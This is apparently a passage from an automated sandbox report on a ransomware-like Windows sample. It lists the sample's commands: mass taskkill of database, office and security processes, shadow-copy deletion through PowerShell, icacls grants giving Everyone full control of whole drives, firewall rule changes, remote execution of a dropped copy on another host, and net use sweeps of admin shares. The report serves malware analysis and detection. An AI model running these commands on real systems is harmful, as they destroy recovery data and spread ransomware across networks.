-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2876
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2656
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2608
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3376
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3568
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1868
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3756
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
PID:212
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3396
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1952
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4064
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4016
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3440
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1240
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1928
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3788
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes2⤵PID:3872
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:848
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3576
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4108
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4164
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4208
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4260
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4300
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
PID:4372
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
PID:4392
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4444
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4556
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4620
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵PID:4656
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4576
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4712
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4844
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4900
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4948
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5036
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5100
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3524
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2588
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2100
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3536
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2548
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
PID:4256
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4204
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4400
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4104
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2200
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵
- Suspicious use of AdjustPrivilegeToken
PID:212
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2168
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4336
-
-
C:\Windows\SYSTEM32\arp.exe"arp" -a2⤵PID:4528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4324
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4372
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4584
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4432
-
-
C:\Users\Admin\AppData\Local\Temp\qy5ts0jh.exe"C:\Users\Admin\AppData\Local\Temp\qy5ts0jh.exe" \\10.10.0.41 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe"2⤵
- Executes dropped EXE
PID:4896
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵PID:4932
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of AdjustPrivilegeToken
PID:4392
-
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵PID:5072
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.16\Users2⤵PID:4172
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.16\Users2⤵PID:3416
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.16\A$2⤵PID:4168
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.16\A$2⤵PID:4192
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.16\B$2⤵PID:2704
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.16\B$2⤵PID:2100
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.16\C$2⤵PID:4400
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.16\C$2⤵PID:4280
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.16\D$2⤵PID:4176
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.16\D$2⤵PID:1952
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.16\E$2⤵PID:4696
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.16\E$2⤵PID:3756
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.16\F$2⤵PID:3372
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.16\F$2⤵PID:3836
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.16\G$2⤵PID:4064
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.16\G$2⤵PID:4984
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.16\H$2⤵PID:3396
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.16\H$2⤵PID:4520
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.16\I$2⤵PID:2668
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.16\I$2⤵PID:4456
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.16\J$2⤵PID:4480
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.16\J$2⤵PID:4564
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\Users2⤵PID:4672
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\K$2⤵PID:4560
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\K$2⤵PID:4608
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\A$2⤵PID:4772
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\L$2⤵PID:4556
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\L$2⤵PID:4640
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\B$2⤵PID:4708
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\M$2⤵PID:5092
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\M$2⤵PID:4972
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\N$2⤵PID:4936
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\C$2⤵PID:5032
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\N$2⤵PID:4044
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\D$2⤵PID:1756
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\O$2⤵PID:2628
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\O$2⤵PID:4240
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\E$2⤵PID:2264
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\P$2⤵PID:3800
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\F$2⤵PID:4284
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\P$2⤵PID:184
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\Q$2⤵PID:3708
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\Q$2⤵PID:4344
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\G$2⤵PID:1016
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\R$2⤵PID:2848
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\R$2⤵PID:4272
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\H$2⤵PID:3088
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\S$2⤵PID:3200
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\S$2⤵PID:4468
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\I$2⤵PID:2120
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\T$2⤵PID:4356
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\J$2⤵PID:4164
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\T$2⤵PID:4108
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\U$2⤵PID:2608
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\K$2⤵PID:4396
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\U$2⤵PID:4436
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\V$2⤵PID:4904
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\L$2⤵PID:4892
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\W$2⤵PID:4648
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\V$2⤵PID:2168
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\M$2⤵PID:4672
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\X$2⤵PID:4608
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\W$2⤵PID:4756
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\N$2⤵PID:4728
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\Y$2⤵PID:4556
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\X$2⤵PID:4844
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\O$2⤵PID:4576
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\Z$2⤵PID:5092
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\Y$2⤵PID:5096
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\P$2⤵PID:4060
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\Z$2⤵PID:4896
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\Q$2⤵PID:3996
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\R$2⤵PID:2484
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\S$2⤵PID:2868
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\T$2⤵PID:5100
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\U$2⤵PID:4240
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\V$2⤵PID:3416
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\W$2⤵PID:1860
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\X$2⤵PID:2256
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\Y$2⤵PID:2588
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.21\Z$2⤵PID:4344
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.27\Users2⤵PID:4880
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.27\A$2⤵PID:4804
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.27\B$2⤵PID:4660
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.27\C$2⤵PID:4148
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.27\D$2⤵PID:4540
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.27\E$2⤵PID:1884
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.27\F$2⤵PID:4352
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.27\G$2⤵PID:4940
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.27\H$2⤵PID:3876
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.27\I$2⤵PID:2320
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.27\J$2⤵PID:4412
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.27\K$2⤵PID:5004
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.27\L$2⤵PID:2200
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.27\M$2⤵PID:4104
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.27\N$2⤵PID:4652
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.27\O$2⤵PID:212
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.27\P$2⤵PID:4620
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.27\Q$2⤵PID:4876
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.27\R$2⤵PID:4952
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.27\S$2⤵PID:4956
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.27\T$2⤵PID:4392
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.27\U$2⤵PID:5084
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.27\V$2⤵PID:3512
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.27\W$2⤵PID:2584
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.27\X$2⤵PID:3920
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.27\Y$2⤵PID:2104
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.27\Z$2⤵PID:3076
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.28\Users2⤵PID:3760
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.28\A$2⤵PID:2580
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.28\B$2⤵PID:2628
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.28\C$2⤵PID:4468
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.28\D$2⤵PID:5100
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.28\N$2⤵PID:3000
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.28\H$2⤵PID:2100
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.28\O$2⤵PID:4320
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.28\I$2⤵PID:3708
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.28\P$2⤵PID:4800
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.28\J$2⤵PID:4380
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.28\K$2⤵PID:1272
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.28\Q$2⤵PID:4388
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.28\R$2⤵PID:4968
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.28\L$2⤵PID:4992
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.28\S$2⤵PID:4964
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.28\M$2⤵PID:3836
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.28\U$2⤵PID:4376
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.28\T$2⤵PID:4848
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.28\V$2⤵PID:5116
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.28\E$2⤵PID:4732
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.28\W$2⤵PID:3380
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.28\X$2⤵PID:4312
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.28\Y$2⤵PID:4100
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.28\Z$2⤵PID:4548
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD54163ec5b7401472725e0f2e034ba2425
SHA15367503941303dfc8118e73e27b35a7b0261ce7e
SHA2560b5779450c48991af2cd1c01471be260aa80e113b54305c9c275482928cfe6ef
SHA512c2b06739b293d483eb5afe7a818d237c12103b2999b4992b96fb7c59cc47a48de217bb99b6f252fd2f32a75c8995417a7b0e600dcad3af85bd8546d384493179
-
Filesize
219KB
MD5b1dfb4f9eb3e598d1892a3bd3a92f079
SHA10fc135b131d0bb47c9a0aaf02490701303b76d3b
SHA256ab50d8d707b97712178a92bbac74ccc2a5699eb41c17aa77f713ff3e568dcedb
SHA51298454df86ddddf20e0b7bd19566006dbec431326e8aa57600aff460e9bec3e6489e43e95be3b252bf78a2edd5c203254508e9b55e756b680c100560664278ca2
-
Filesize
219KB
MD5b1dfb4f9eb3e598d1892a3bd3a92f079
SHA10fc135b131d0bb47c9a0aaf02490701303b76d3b
SHA256ab50d8d707b97712178a92bbac74ccc2a5699eb41c17aa77f713ff3e568dcedb
SHA51298454df86ddddf20e0b7bd19566006dbec431326e8aa57600aff460e9bec3e6489e43e95be3b252bf78a2edd5c203254508e9b55e756b680c100560664278ca2